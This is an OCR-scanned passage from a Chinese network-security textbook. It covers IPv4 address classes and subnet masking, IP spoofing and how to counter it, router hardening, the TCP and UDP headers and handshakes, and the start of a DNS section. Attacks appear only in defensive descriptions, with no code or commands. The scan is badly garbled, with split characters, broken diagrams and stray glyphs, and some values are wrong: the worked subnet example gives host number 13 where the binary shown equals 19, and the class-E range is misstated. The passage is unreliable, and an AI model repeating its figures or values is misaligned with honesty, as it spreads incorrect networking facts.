第 四 阶段 是 1996 年 提出 的 网 络 地 址 转换 (NAT) 技 术 , 主 要 是 为 了 解决 地 址 短缺 的 
问题 。 

IPv4 的 地 址 长 度 为 32b, 用 点 分 十 进 制 表示 。 通 常 采 用 X. X. X. X 的 格式 表示 ,每 个 X 


22 网 络 安全 教程 及 实践 


为 8 位 ,例如 ,202. 201. 32. 19 ,每 个 X 的 取 值 范围 为 0 一 255。 标 准 分 类 的 IP 地 址 如 图 2-7 
所 示 。 


1 8 16 24 科 
本 本 本 醒 二 畏 可 本 本 本 四 是 | LI 


己 
己 
? 
己 


-0.0. 网 络 号 (7b 主机 号 (24b 
127.255.255.255 [9| 网 络 号 (7b) 主机 (24b) 


128.0.0: 10 网 络 号 (14b) 主机 号 (16b) 


C 类 地 址 
192.0.0.0~ | 110 网 络 号 (21b) 主机 号 (8b) 
223.255.255.255 

DD 类 
2 二 [no 组 播 地 址 (28b 
239.255.255.255 
E 类 地 址 
240.0.0.0~ 1110 保留 用 于 实验 和 将 来 使 用 (28b) 
247.255.255.255 


图 2-7 标准 分 类 的 IP 地址 


在 Internet 中 ,每 一 台 主 机 都 有 一 个 唯一 的 IP 地 址 ,而 特殊 的 主机 或 网 关 常 有 多 于 两 
个 或 者 更 多 的 IP 地 址 , 称 这 样 的 主机 为 多 穴 主机 。 

在 IP 地 址 中 ,网 络 号 主要 用 于 路 由 器 寻找 目的 网 络 .查找 路 由 表 , 主 机 号 则 用 于 标识 一 
个 网 络 中 的 具体 主机 。 

除了 图 2-7 中 所 列 的 标准 A 类 、B 类 、C 类 地 址 外 ,还 有 一 些 特殊 的 地 址 ,这 些 特殊 的 地 
址 如 下 。 

(1) 直接 广播 地 址 ,是 A 类 、B 类 、C 类 地 址 中 主机 号 全 为 1 的 地 址 , 它 用 来 使 路 由 器 将 
一 个 分 组 以 广播 方式 发 送 给 该 网 络 上 的 所 有 主机 。 

(2) 受 限 广播 地 址 ,是 网 络 号 和 主机 号 全 为 1 的 IP 地 址 (255. 255. 255. 255) , 它 用 来 将 
一 个 分 组 以 广播 的 方式 发 送 给 本 物理 网 络 中 的 所 有 主机 。 路 由 器 则 限制 该 分 组 通过 ,将 其 
广播 功能 只 限制 在 本 网 内 部 。 

(3) 这 个 网 络 上 的 特定 主机 地 址 ,是 网 络 号 为 0 的 地 址 ,该 地 址 指向 该 网 络 上 的 特定 主 
机 (如 0. 0.0. 126 表示 该 网 络 上 主机 地 址 为 126 的 主机 ) 。 

(4) 回 送 地 址 ,是 指 A 类 地 址 中 的 127. 0. 0.0, 它 是 一 个 保留 地 址 段 ( 亦 即 实际 测试 时 
从 127.0.0.1 一 127. 255. 255. 254 都 是 回 送 地 址 ) ,用 于 网 络 软件 测试 和 本 地 进程 间 的 通信 。 
TCP/IP 规定 : 包含 网 络 号 为 127 的 分 组 不 能 出 现在 任何 网 络 上 ; 主机 和 路 由 器 不 能 为 该 
地 址 广播 任何 寻 址 信息 。“Ping” 命 令 可 以 发 送 一 个 以 回 送 地 址 为 目的 地 址 的 分 组 ,用 来 测 
试 IP 软件 能 否 接 收 或 发 送 一 个 分 组 。 一 个 客户 进程 可 以 用 回 送 地 址 发 送 一 个 分 组 给 本 机 
的 另 一 个 进程 ,来 测试 本 地 进程 之 间 的 通信 状况 。 

子 网 掩 码 是 一 个 和 IP 地 址 格式 相似 的 32 位 地 址 ,用 于 屏蔽 IP 地 址 的 一 部 分 以 区 别 网 
络 标识 和 主机 标识 ,并 说 明 该 IP 地 址 是 在 局 域 网 上 ,还 是 在 远程 网 上 。 

IP 标准 规定 : 每 一 个 使 用 子 网 的 工作 站 都 选择 一 个 32 位 的 位 模式 , 若 位 模式 的 某 位 置 
为 1, 则 对 应 IP 地 址 中 的 某 位 为 网 络 地 址 中 的 一 位 ; 若 位 模式 中 的 某 位 置 为 0, 则 对 应 IP 地 
址 中 的 某 位 为 主机 地 址 中 的 一 位 。 例 如 位 模式 为 : 
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11111111 11111111 11111111 00000000 

前 三 个 字 节 全 为 1, 代 表 对 应 IP 地 址 中 最 高 的 三 个 字 节 为 网 络 地 址 ; 后 一 个 字 节 全 为 
0, 代 表 对 应 IP 地 址 中 最 后 一 个 字 节 为 主机 地 址 。 这 种 位 模式 叫做 子 网 掩 码 (Subnet 
Mask) 。 为 了 使 用 方便 ,常常 使 用 点 分 十 进 制 表示 法 来 表示 子 网 掩 码 , 上 面 的 子 网 掩 码 则 又 
可 以 表示 为 : 255. 255. 255. 0。 有 时 也 直接 在 二 进 制 的 IP 地 址 中 将 网 络 地 址 用 下 划 线 表 
示 , 即 ， 

11001010. 11001001. 00100000. 00010011 

还 可 以 采用 在 人 P 地址 后 用 数字 表示 网 络 位 的 方法 表示 网 络 地 址 , 即 202. 201. 32. 19/24， 
这 几 种 表示 方法 具有 同样 的 意义 。 

通过 将 子 网 掩 码 与 IP 地 址 结合 使 用 ,就 可 以 区 分 出 一 个 网 络 地址 的 网 络 号 和 主机 号 。 

例如 ,上 述 C 类 地 址 202. 201. 32. 19 , 子 网 掩 码 为 255. 255. 255.0, 则 它 的 网 络 号 和 主机 
号 可 以 按 如 下 方法 得 到 。 

(1) 将 IP 地 址 转换 为 二 进 制 数 : 11001010 11001001 00100000 00010011 。 

(2) 将 子 网 掩 码 转换 为 二 进 制 数 : 11111111 11111111 11111111 00000000。 

(3) 将 两 个 二 进 制 数 进 行 罗 辑 与 运算 ,结果 为 11001010 11001001 00100000 00000000， 
转换 为 点 分 十 进 制 数 为 202. 201. 32. 0 ,此 即 为 网 络 号 。 

(4) 将 子 网 掩 码 取 反 再 与 IP 地 址 多 辑 与 运算 ,结果 为 00000000 00000000 00000000 
00010011 ,转换 为 点 分 十 进 制 数 为 0.0. 0. 13 , 即 主机 号 为 13。 


2.3.6 IP 地 址 中 的 安全 性 问题 


由 于 IP 地 址 是 一 个 逻辑 地 址 ,因此 可 以 方便 地 通过 操作 系统 修改 IP 地 址 ,这 也 为 网 络 
安全 带 来 了 隐患 。 黑 客 可 以 设置 一 个 局 域 网 内 合法 的 IP 地 址 ,并 连 入 网 络 , 嗅 探 网 络 内 各 
种 信息 ,然后 窃取 密码 ,从 而 进入 敏感 区 域 ,偷窃 甚 至 资 取 机 密 信息 。 

攻击 者 也 可 以 采用 伪造 的 源 IP 地 址 向 一 个 主机 发 送 ICMP echo 报 文 , 而 该 主机 则 会 
将 回应 报 文 发 送 到 伪造 了 IP 地 址 的 站 点 ,大量 的 报 文 则 会 对 伪造 的 IP 地 址 站 点 造成 拒绝 
服务 攻击 。 

解决 IP 欺骗 技术 攻击 的 方法 通常 有 以 下 三 种 。 

(1) 使 用 Netlog 之 类 的 网 络 监视 软件 来 监视 数据 包 , 查 看 外 部 接口 上 的 数据 包 , 来 检 
查 是 否 有 伪造 的 IP 地 址 站 点 发 送 来 的 数据 包 。 还 可 以 比较 内 部 网 络 不 同系 统 间 的 进程 账 
号 日 志 , 如 果 IP 欺骗 攻击 了 一 个 系统 ,就 可 以 在 受 攻 击 的 系统 上 得 到 一 个 日 志 项 ,里 面 显示 
对 应 的 远程 访问 ,在 源 机 器 上 ,将 没有 对 应 的 初始 化 该 远程 访问 的 记录 项 。 

(2) 使 用 交换 机 提供 的 端口 的 单 地 址 工作 模式 来 控制 非法 IP 地 址 的 访问 , 即 交 换 机 的 
每 一 个 端口 只 允许 一 台 主 机 通过 该 端口 访问 网 络 ,任何 其 他 地 址 的 主机 的 访问 被 拒绝 。 

(3) 通过 安装 包 过 滤 路 由 器 ,不 允许 包含 内 部 网 络 地 址 的 数据 包 通 过 该 路 由 器 。 此 外 ， 
在 发 出 的 数据 包 中 ,应 该 过 滤 掉 源 地 址 与 内 部 网 络 地 址 不 同 的 数据 包 , 这 样 可 以 防止 源 于 内 
部 网 络 的 IP 欺骗 攻击 。 


2.3.7 路 由 器 的 安全 设置 
在 网 络 层 ,一 个 重要 的 设备 就 是 路 由 器 ,其 主要 用 于 连接 因特网 中 各 局 域 网 .广域网 ,并 
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根据 信道 的 情况 自动 选择 和 设 定 路 由 ,以 最 佳 路 径 、 按 先后 顺序 发 送 数据 分 组 。 

从 安全 功能 的 角度 考虑 ,安全 路 由 器 应 该 担当 三 个 方面 的 安全 功能 : 网 络 系统 的 安全 、 
路 由 器 本 身 的 安全 以 及 网 络 信息 的 安全 。 路 由 器 作为 内 部 网 络 与 外 部 网 络 之 间 通 信 的 关键 
设备 ,有 必要 提供 充分 的 安全 保护 功能 ,以 保障 使 用 者 所 在 的 网 络 安全 。 

加 强 网 络 安全 ,设置 安全 路 由 器 的 措施 有 很 多 种 , 堵 住 安全 漏洞 .禁用 不 必要 的 服务 、 限 
制 逻辑 访问 和 传输 加 密 等 都 是 增强 路 由 器 安全 的 方法 ,如 果 希 望 最 大 限度 地 保证 网 络 系 统 
的 安全 和 网 络 信息 的 安全 ,首先 要 防止 外 来 使 用 者 甚至 是 黑客 对 网 络 安全 的 威胁 ,加 强 路 由 
器 身份 辨认 。 避 免 身份 危机 也 是 至 关 重 要 的 ,路 由 器 中 的 身份 认证 主要 指 访问 路 由 器 时 的 
身份 认证 、 对 端 路 由 器 的 身份 认证 和 路 由 信息 的 身份 认证 ,防止 黑客 利用 弱 口 令 或 默认 口令 
进行 攻击 ,是 保障 网 络 信息 安全 的 最 好 途径 。 另 外 ,还 需要 对 传输 信息 进行 加 密 , 也 可 以 达 
到 较 好 的 保护 效果 。IPSec 是 路 由 器 常用 的 协议 ,借助 该 协议 ,路 由 器 支持 建立 虚拟 专用 网 
(VPN)。 应 在 公共 IP 网 络 上 确保 数据 通信 的 可 靠 性 和 完整 性 ,保障 数据 安全 穿越 公 网 而 
没有 被 侦 听 。 

为 了 避免 因为 数据 窃听 而 造成 的 信息 泄漏 ,有 必要 对 所 传输 的 信息 进行 加 密 , 只 有 与 之 
通信 的 对 端 才 能 对 此 密 文 进行 解密 。 用 户 在 对 路 由 器 配置 进行 改动 之 后 ,需要 对 其 进行 监 
控 。 如 果 用 户 使 用 SNMP, 那 么 一 定 要 选择 功能 强大 的 共用 字符 串 , 最 好 是 使 用 提供 消息 
加 密 功 能 的 SNMP。 用 户 还 可 以 利用 出 站 访问 控制 限制 来 自 网 络 内 部 的 流量 。 这 种 控制 
可 以 防止 内 部 主机 发 送 ICMP 流量 ,只 允许 有 效 的 源 地 址 包 离 开 网 络 。 这 有 助 于 防止 IP 地 
址 欺骗 ,减少 黑客 利用 用 户 系统 攻击 另 一 站 点 的 可 能 性 。 

通过 设置 路 由 器 ,可 以 提高 路 由 器 和 网 络 的 安全 性 ,常用 的 设置 方法 如 下 。 

(1) 修补 和 经 常 更 新 路 由 器 的 操作 系统 (IOS) 。 就 像 网 络 操作 系统 一 样 ,路 由 器 的 操作 
系统 也 会 存在 漏洞 ,也 会 出 现 由 于 编程 错误 .软件 甫 症 和 缓存 溢出 的 问题 ,所 以 应 经 常 更 新 
路 由 器 的 操作 系统 ,及 时 打上 补丁 。 

(2) 修改 默认 的 口令 。 据 统计 ,80% 的 安全 事件 都 是 由 于 较 弱 或 者 默认 的 口令 引起 的 。 
避免 使 用 普通 的 口令 ,并 且 使 用 大 小 写字 母 混合 的 方式 作为 更 强大 的 口令 规则 是 提高 路 由 
器 安全 性 的 重要 手段 之 一 。 

(3) 禁用 HTTP 设置 和 SNMP( 简 单 网 络 管理 协议 )。 尽 管 路 由 器 的 HTTP 设置 部 分 
可 以 方便 网 络 管理 员 进行 异地 管理 配置 ,但 是 ,对 路 由 器 来 说 则 存在 安全 问题 。 

(4) 禁用 ICMP( 互 联网 控制 消息 协议 ) ,特别 是 应 该 封锁 ICMP 的 Ping 请 求 。ICMP 
是 一 种 无 状态 的 协议 , 它 位 于 IP 层 的 顶端 ,允许 在 两 个 主机 之 间 验 证 主机 的 可 用 信息 ,黑客 
也 会 利用 该 功能 确认 目标 主机 是 否 存活 ,并 利用 路 由 器 上 启用 的 ICMP 功能 找 出 可 用 来 攻 
击 路 由 器 和 网 络 的 信息 。 网 络 管理 员 通常 会 利用 Ping 和 其 他 ICMP 功能 排除 网 络 故障 ,但 
黑客 同样 也 会 利用 该 功能 发 现 网 络 设备 并 判断 出 其 连接 结构 ,甚至 对 网 络 实施 Ping Flood 
等 拒绝 服务 攻击 。 

(5) 禁用 来 自 互 联网 的 Telnet 命令 。 

(6) 禁用 IP 定向 广播 。IP 定向 广播 能 够 对 路 由 设备 实施 拒绝 服务 攻击 ,路 由 器 的 内 存 
和 CPU 难以 承受 太 多 的 请 求 。 这 种 结果 会 导致 路 由 器 缓存 溢出 而 无 法 正常 工作 。 

(7) 阻止 路 由 跟踪 ,禁用 IP 路 由 和 IP 重新 定向 。 路 由 跟踪 是 一 种 收集 网 络 拓 扑 信 息 
的 方法 ,该 方法 可 以 检测 到 达 目 标 系统 的 设备 。 黑 客 可 以 利用 路 由 跟踪 判断 连接 到 目的 地 
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的 路 径 ,进而 进行 各 种 攻击 。 

(8) 设置 启用 包 过 滤 功 能 ,过 滤 出 入 的 数据 包 , 还 可 以 设置 允许 进入 内 部 网 络 的 数据 
包 , 限 制 访问 内 部 网 络 的 主机 的 IP 地 址 和 范围 。 在 要 求 安全 性 更 高 的 情况 下 ,可 以 设 定 特 
定 地 址 与 端口 组 合 的 数据 流 才 可 以 通过 边界 路 由 器 ,进一步 提高 网 络 系统 的 安全 性 。 

(9) 审查 安全 记录 。 

(10) 禁止 不 必要 的 服务 ,禁止 未 使 用 的 接口 。 

(11) 对 特定 路 由 设备 ,应 关闭 安全 性 不 高 的 协议 。 例 如 对 于 Cisco 路 由 器 ,其 使 用 了 
CDP 思科 (设备 ) 发 现 协 议 来 发 现 邻 近 设备 的 相关 信息 ,如 型 号 以 及 IOS 版 本 、 修 订 信息 等 。 
但 是 ,该 协议 的 安全 性 很 低 , 因 此 应 该 在 边界 路 由 器 中 禁用 CDP, 或 者 根据 管理 的 要 求 在 内 
部 路 由 器 和 交换 机 中 禁用 该 协议 。 

(12) 使 用 管理 访问 控制 系统 。 即 通过 身份 验证 (Authentication) ,授权 (Authorization) 、 记 
录 (Accounting) 的 AAA 方式 ,对 用 户 的 身份 进行 验证 ,验证 通过 以 后 对 其 可 以 访问 的 资源 
和 访问 过 程 进行 授权 ,并 记录 用 户 正 在 执行 的 操作 和 已 经 执行 的 操作 ,以便 事后 审计 。 

使 用 管理 访问 控制 系统 ,在 管理 员 初次 登录 时 ,AAA 系统 将 使 用 位 于 中 央 服 务 器 上 的 
数据 库 验证 该 管理 员 ,同时 在 管理 员 连 接 会 话 期 间 控制 其 进行 的 各 种 操纵 。 

(13) 在 可 能 的 情况 下 ,考虑 使 用 静态 路 由 。 静 态 路 由 可 防止 专门 的 数据 包 更 改 路 由 器 
中 的 路 由 表 。 但 应 注意 ,在 静态 路 由 情况 下 ,如 果 某 个 链 路 的 连接 失败 ,路 由 器 不 会 自动 切 
换 到 备用 路 由 器 ,因此 ,网 络 管理 员 必 须 时 刻 监视 网 络 链 路 的 连接 状况 。 另 外 ,网 络 规模 较 
大 时 ,静态 路 由 的 配置 过 程 比较 复杂 。 

(14) 控制 路 由 器 的 物理 访问 。 由 于 路 由 器 通常 都 存在 一 些 后 门 访问 方法 , 当 攻 击 者 能 
够 接触 到 这 些 实际 的 物理 设备 时 , 便 会 通过 这 些 后 门 访问 方法 进入 路 由 器 ,甚至 会 初始 化 路 
由 器 。 因 此 ,应 该 对 重要 的 设备 ,增加 物理 安全 策略 ,确保 设备 的 物理 安全 。 


2.3.8 传输 层 及 其 TCP 与 UDP 协议 


1. TCP/IP 的 传输 层 

TCP/IP 的 传输 层 作 用 与 OSI 参考 模型 中 传输 层 的 作用 是 基本 相同 的 , 即 实现 源 主机 
与 目的 主机 进程 之 间 的 端 到 端的 数据 传输 ,而 网 络 层 只 提供 主机 到 主机 之 间 的 通信 , 链 路 层 
提供 相 邻 结 点 之 间 的 数据 传输 。 

TCP/IP 的 传输 层 主 要 有 两 个 协议 , 即 TCP 与 UDP。 

2. UDP 

UDP 即 用 户 数 据 报 协议 ,是 一 种 无 连接 的 协议 ,使 用 该 协议 时 ,双方 不 需要 建立 连接 ， 
源 主机 只 要 有 数据 需要 发 送 就 发 送出 去 ,而 不 管 发 送 的 数据 包 是 否 到 达 了 目标 主机 ,也 不 管 
数据 包 在 传输 过 程 中 是 否 出 现 了 错误 , 收 到 数据 包 的 主机 也 不 会 告诉 发 送 方 是 否 正确 收 到 
了 数据 ,因此 ,UDP 是 一 种 不 可 靠 的 传输 协议 。 

TCP/IP 中 用 端口 号 来 标识 通信 双方 的 进程 ,端口 号 是 在 0 一 65 535 之 间 的 整数 。 

Internet 赋 号 管理 局 (IANA) 定 义 的 UDP 端口 号 分 为 三 类 , 即 熟 知 端口 号 、 注 册 端 口号 
和 临时 端口 号 。 

(1) 熟知 端口 号 ,是 为 一 些 常用 的 网 络 服务 定义 的 端口 号 ,例如 端口 号 7 表示 Echo 服 
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务 进程 ,作用 是 将 收 到 的 数据 报 回 送 到 发 送 器 。 熟 知 端口 号 范围 为 0 一 1023 。 

(2) 注册 端口 号 , 取 值 范围 为 1024 一 49 151 ,用户 根据 需要 可 以 在 IANA 注册 ,以 防止 
重复 。 

(3) 临时 端口 号 ,是 用 户 在 客户 机 向 服务 器 发 出 连接 请 求 时 由 客户 机 上 的 UDP 软件 随 
机 选取 的 端口 号 ,其 取 值 范围 为 49 152 一 65 535 ,它们 可 由 任何 进程 来 使 用 。 

通常 ,服务 器 端 使 用 熟知 端口 号 和 注册 端口 号 来 提供 服务 ,而 临时 端口 号 应 用 于 客户 
端 , 仅 在 客户 进程 运行 时 才 动 态 选 择 。 当 服务 器 进程 收 到 客户 进程 的 报 文 时 ,就 知道 了 客户 
进程 所 使 用 的 端口 号 ,因而 可 以 把 数据 发 送 给 客户 进程 。 通 信 结 束 后 ,刚才 已 使 用 过 的 端口 
号 就 被 释放 ,可 以 供 其 他 客户 进程 使 用 。 

UDP 数据 报 的 格式 如 图 2-8 所 示 , 从 图 中 可 以 看 出 ,UDP 数据 报 的 头 部 是 固定 的 8B 
长 的 报头 。 


0 8 16 24 31b 
ed Te 
1 源 IP 地 址 | 
2 和 
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式 | 轴 ， 目的 IP 地 址 | 
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| 00000000 ! 协 议 号 (17D) UDP 长 度 1 
溉 | 源 端口 号 目的 端口 号 器 
下 EE 
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8 数据 图 
8 | (必须 进行 填充 使 数据 是 16b 的 售 数 ) 2 
2 
So 


图 2-8 UDP 用 户 数据 报 的 格式 


UDP 报头 主要 有 以 下 字段 。 

(1) 端口 号 ,包括 源 端 口号 和 目的 端口 号 。 端 口号 字段 的 长 度 为 16b。 源 端口 号 是 在 
源 主机 上 运行 的 进程 使 用 的 端口 号 ,目的 端口 号 是 在 目的 主机 上 运行 的 进程 使 用 的 端口 号 。 
在 传输 连接 建立 的 过 程 中 , 源 进程 是 客户 Client, 则 源 端口 号 是 临时 端口 号 , 它 由 该 进程 请 
求 ,由 源 主机 上 运行 的 UDP 软件 进行 分 配 。 目 的 端口 号 是 Server 熟知 端口 号 。 

(2) UDP 总 长 度 ,定义 了 包括 报头 在 内 的 用 户 数据 报 的 总 长 度 ,由 于 该 字段 长 度 是 
16b, 因 此 UDP 数据 报 的 长 度 最 大 为 65 535B, 最 小 长 度 为 8B。 如 果 数 据 报 长 度 是 8B, 则 说 
明 该 用 户 数据 报 只 有 报头 ,而 没有 数据 。 

(3) 校 验 和 ,UDP 校 验 和 字段 是 可 选项 ,是 用 来 检验 整个 用 户 数 据 报 (包括 报头 ) 在 传 
输 过 程 中 是 否 出 现 差 错 。UDP 校 验 和 包括 三 部 分 : 伪 报 头 `UDP 报头 及 应 用 层 的 数据 。 

3. TCP 

TCP 即 传输 控制 协议 ,是 一 种 功能 完善 的 可 靠 的 传输 层 协议 。 其 特点 表现 在 以 下 几 
方面 。 

(1) 支持 可 靠 的 面向 连接 的 服务 ,在 进行 实际 数据 传输 前 ,必须 在 源 进程 与 目的 进程 间 
建立 一 条 传输 连接 。TCP 也 使 用 端口 号 来 标识 这 种 连接 完成 通信 任务 。 

(2) 支持 流传 输 , 即 在 传输 数据 报 文 时 ,采用 了 像 流 一 样 的 无 报 文 丢失 、 重 复 和 失 序 的 
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方式 传输 数据 报 文 序列 ,并 采用 确认 与 超时 重 传 来 保证 可 靠 性 ,采用 窗口 机 制 来 进行 流量 
控制 。 

(3) 支持 全 双 工 服务 , 即 在 同一 时 间 内 TCP 支持 双向 的 数据 流动 。 

(4) 支持 可 靠 服务 ,其 采用 确认 机 制 来 检查 数据 是 否 安全 和 完整 地 到 达 。 

TCP 端口 号 分 配 办 法 与 UDP 原则 上 是 相同 的 ,只 是 由 于 应 用 层 协 议 的 关系 ,具体 应 用 
类 型 是 不 同 的 。TCP 通过 使 用 网 络 层 的 IP 地 址 和 传输 层 的 端口 号 在 全 网 唯一 地 标识 一 个 
进程 ,一 个 IP 地 址 与 一 个 端口 号 的 组 合 就 称 为 Socket 地 址 。 一 个 源 Socket 地 址 和 目的 
Socket 地 址 ,再 加 上 相应 的 通信 协议 ,可 以 标识 全 网 唯一 的 通信 ,这 样 由 “协议 、 源 地 址 、 源 
端口 号 .目标 地 址 、 目 标 端口 号 ?组 成 的 组 合 称 为 一 个 五 元 组 。 

TCP 通过 下 列 方式 来 提供 可 靠 性 。 

(1) 应 用 数据 将 被 分 割 成 TCP 认为 最 适合 发 送 的 数据 块 。 这 一 点 与 UDP 完全 相同 。 
在 UDP 中 ,应 用 程序 产生 的 数据 报 长 度 将 保持 不 变 。TCP 传递 给 IP 的 信息 单位 称 为 报 文 
段 或 段 。 

(2) 当 TCP 发 出 一 个 报 文 段 后 , 它 启动 一 个 定时 器 ,等待 目 的 端 确认 收 到 这 个 报 文 段 。 
如 果 不 能 及 时 收 到 一 个 确认 ,将 重 发 这 个 报 文 段 。TCP 中 有 自 适应 的 超时 及 重 传 策略 。 

(3) 当 TCP 收 到 发 自 TCP 连接 另 一 端的 数据 时 , 它 将 发 送 一 个 确认 。 这 个 确认 不 是 
立即 发 送 ,通常 会 推迟 几 分 之 一 秒 。 

(4) TCP 将 保持 它 头 部 和 数据 的 校 验 和 。 这 是 一 个 端 到 端的 校 验 和 ,目的 是 检测 数据 
在 传输 过 程 中 的 任何 变化 。 如 果 收 到 段 的 校 验 和 有 差错 ,TCP 将 丢弃 这 个 报 文 段 并 不 予 确 
认 ,发 送 端 等 待 超时 并 重 发 。 

(5) 由 于 TCP 报 文 段 作 为 IP 数据 报 来 传输 ,而 IP 数据 报 的 到 达 可 能 会 乱 序 ,因此 ， 
TCP 报 文 到 达 时 也 会 出 现 乱 序 的 现象 ,此 时 TCP 需要 对 接收 到 的 数据 报 进行 重新 排序 , 然 
后 将 正确 的 数据 传送 给 应 用 层 。 

(6) 由 于 IP 数据 报 会 发 生 重复 ,那么 接收 方 的 TCP 必须 检查 TCP 报 文 段 的 序号 , 丢 
弃 重 复 的 报 文 段 。 

(7) TCP 采用 可 变 窗口 方法 进行 流量 控制 ,根据 接收 方 缓冲 区 的 大 小 来 协调 发 送 方 的 
发 送 速 度 ,以 防止 接收 缓冲 区 溢出 ,造成 数据 丢失 。 同 时 ,TCP 还 要 进行 拥塞 控制 ,以 进 一 
步 提高 可 靠 性 。 

(8) TCP 对 数据 流 的 内 容 不 做 任何 解释 。TCP 不 知道 传输 的 数据 流 是 二 进 制 数据 ,还 
是 ASCII 字符 或 者 其 他 类 型 的 数据 ,对 数据 流 的 解释 由 双方 的 应 用 程序 来 处 理 。 

根据 以 上 的 分 析 , 可 以 看 出 ,TCP 必须 按照 上 述 的 工作 过 程 ,设计 一 定 结 构 的 数据 传输 
单元 来 实现 协议 的 要 求 。TCP 的 数据 传输 单元 叫做 报 文 段 。 

TCP 报 文 段 及 其 头 部 的 格式 如 图 2-9 所 示 。 

报 文 段 报头 长 度 为 20 一 60B。 报 头 的 固定 部 分 长 度 为 20B, 选 项 部 分 长 度 为 40B。TCP 
报 文 段 的 报头 部 分 主要 包括 以 下 字段 。 

(1) 端口 号 ,与 UDP 的 端口 号 含义 基本 相同 。 

(2) 序号 ,是 长 度 为 32b 的 一 个 数 , 它 被 分 配给 本 报 文 段 数据 的 第 一 个 字 节 。 

(3) 确认 号 ,长 度 为 32b, 表 示 已 经 正确 地 收 到 了 序号 从 初始 值 到 N 的 报 文 段 , 要 求 发 
送 方 下 一 个 应 该 发 送 序 号 为 N 十 1 的 报 文 段 。 
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图 2-9 TCP 报 文 头 部 格式 


(4) 报头 长 度 , 该 字段 长 度 为 4b, 表 示 以 4B 为 一 个 单元 来 计算 的 报头 的 长 度 。 该 字段 
的 值 为 5 一 15 之 间 , 因 此 报头 长 度 为 20 一 60B 之 间 。 

(5) 保留 字段 ,长 度 为 6b, 留 做 以 后 使 用 。 

(6) 控制 字段 ,长 度 为 6b ,定义 了 6 种 不 同 的 控制 位 或 标志 ,使 用 时 在 同一 时 间 可 设置 
一 位 或 多 位 。 

(7) 窗口 大 小 ,长 度 为 16b, 表 示 要 求 对 方 必须 维持 的 窗口 大 小 ,其 单位 是 B。 由 于 窗口 
大 小 字段 长 度 为 16b, 因 此 窗口 的 最 大 长 度 是 65 535B。 

(8) 紧急 指针 ,长 度 为 16b, 只 有 当 紧 急 标志 URG 置 位 时 ,这 个 位 字段 才 有 效 。 

(9) 选项 字段 可 以 允许 报头 有 最 大 40B 的 选项 字段 。 

(10) 校 验 和 ,与 UDP 中 计算 校 验 和 的 方法 类 似 ,不 同 的 是 在 UDP 中 校 验 和 的 计算 以 
及 用 户 数 据 报 中 是 否 包括 校 验 和 都 是 可 选 的 ,而 TCP 必须 将 校 验 和 包括 进去 。 

TCP 是 面向 连接 的 协议 ,面向 连接 的 协议 在 源 进 程 与 目的 进程 之 间 建 立 一 条 虚 路 径 ， 
属于 一 个 报 文 的 所 有 报 文 段 都 沿 着 这 条 虚 路 径 发 送 。 整 个 报 文 使 用 一 条 虚 路 径 传输 。 在 
TCP 中 ,面向 连接 的 过 程 是 通过 两 个 过 程 来 完成 连接 建立 和 连接 终止 的 。 

TCP 的 连接 建立 过 程 采 用 了 “三 次 握手 ”的 方式 进行 ,以 主机 A 欲 和 主机 B 建立 连接 
为 例 , 其 建立 连接 的 过 程 如 下 。 

(1) 主机 A 发 送 报 文 段 宣布 它 愿意 建立 连接 , 报 文 段 包 括 关 于 A 到 B 的 通信 和 量 的 初始 
化 信息 。 

(2) 主机 B 发 送 报 文 段 ,确认 A 的 请 求 ,主机 B 发送 的 报 文 段 包括 从 B 到 A 的 通信 量 
的 初始 化 信息 。 

(3) 主机 A 发 送 报 文 段 确认 B 的 请 求 。 

图 2-10 给 出 了 TCP 在 传输 连接 建立 过 程 中 三 次 握手 的 过 程 。 

通信 结束 后 ,TCP 采用 4 次 握手 过 程 完 成 连接 释放 ,如 图 2-11 所 示 。 
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图 2-11 TCP 在 释放 连接 过 程 中 的 四 次 
握手 示意 图 


图 2-10 ”TCP 在 建立 连接 过 程 中 的 三 次 
握手 过 程 示意 图 


在 这 个 过 程 中 ,通常 是 客户 应 用 程序 打算 终止 连接 ,通知 它 的 TCP, 它 已 完成 数据 发 
送 ,并 要 求 释放 这 一 次 的 传输 连接 。 具 体 释放 过 程 如 下 。 

(1) 发 送 端 (主机 A) 发 送 FIN 报 文 要 求 释 放 连 接 。 

(2) 接收 端 ( 主 机 B) 发 送 ACK 报 文 段 , 用 来 应 答 接收 到 的 FIN 报 文 段 。 在 这 种 报 文 段 
中 使 用 了 确认 号 , 它 等 于 收 到 的 FIN 报 文 段 中 的 序号 加 1 。 

(3) 接收 端 同意 释 放 连 接 后 ,向 发 送 端 发 送 FIN 报 文 ,同意 释放 连接 。 

(4) 发 送 端 发 送 ACK 报 文 段 , 用 来 应 答 接 收 到 的 接收 端 发 送 来 的 FIN 报 文 , 这 个 报 文 
段 包括 确认 号 , 它 等 于 FIN 报 文 段 的 序号 加 1 。 

在 后 面 的 章节 中 ,可 以 看 到 捕获 到 的 TCP 建立 连接 的 三 次 握手 和 释放 连接 的 四 次 握手 
的 数据 报 文 。 


2.3.9 应 用 层 及 其 协议 


1. 应 用 层 的 主要 协议 

在 TCP/IP 参考 模型 中 ,应 用 层 是 参考 模型 的 最 高 层 。 应 用 层 的 协议 主要 有 以 下 几 种 。 

(1) 远程 登录 协议 (Telent) ,用 于 实现 互联 网 中 远程 登录 功能 。 

(2) 文件 传输 协议 (FTP) ,用 于 实现 互联 网 中 交互 式 文件 传输 功能 。 

(3) 简单 邮件 传输 协议 (SMTP) ,用 于 实现 互联 网 中 邮件 的 传送 。 

(4) 域名 系统 (DNS) ,用 于 实现 域名 到 IP 地 址 映射 的 网 络 服务 。 

(5) 简单 网 络 管理 协议 (SNMP) ,用 于 管理 和 监视 网 络 设备 及 网 络 的 运行 状况 。 

(6) 超 文本 传送 协议 (HTTP) ,用 于 Web 服务 。 

2. DNS 域名 系统 

域名 系统 (DNS) 提 供 的 机 制 可 将 人 类 容易 理解 的 主机 名 转换 为 计算 机 或 网 络 可 识别 
的 数字 地 址 形式 , 它 使 得 各 种 Internet 应 用 成 为 可 能 ,是 应 用 层 协议 工作 的 基础 。 
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将 域名 转换 成 对 应 的 卫 地 址 的 过 程 叫 做 域名 解析 。 域 名 解析 与 地 址 解析 是 很 类 似 的 , 它 
们 所 涉及 的 网 络 层次 不 同 。 地 址 解析 是 将 全 地 址 转换 为 对 应 的 MAC 子 层 物理 地 址 的 过 程 。 

在 因特网 的 早期 阶段 ,网 上 的 每 个 站 点 都 能 保留 一 个 主机 列表 ,其 中 列 有 相关 的 每 个 机 
器 的 名 字 和 IP 地 址 , 随 着 联网 的 主机 数量 的 增加 ,使 每 个 站 点 都 保留 一 份 主机 列表 就 不 现 
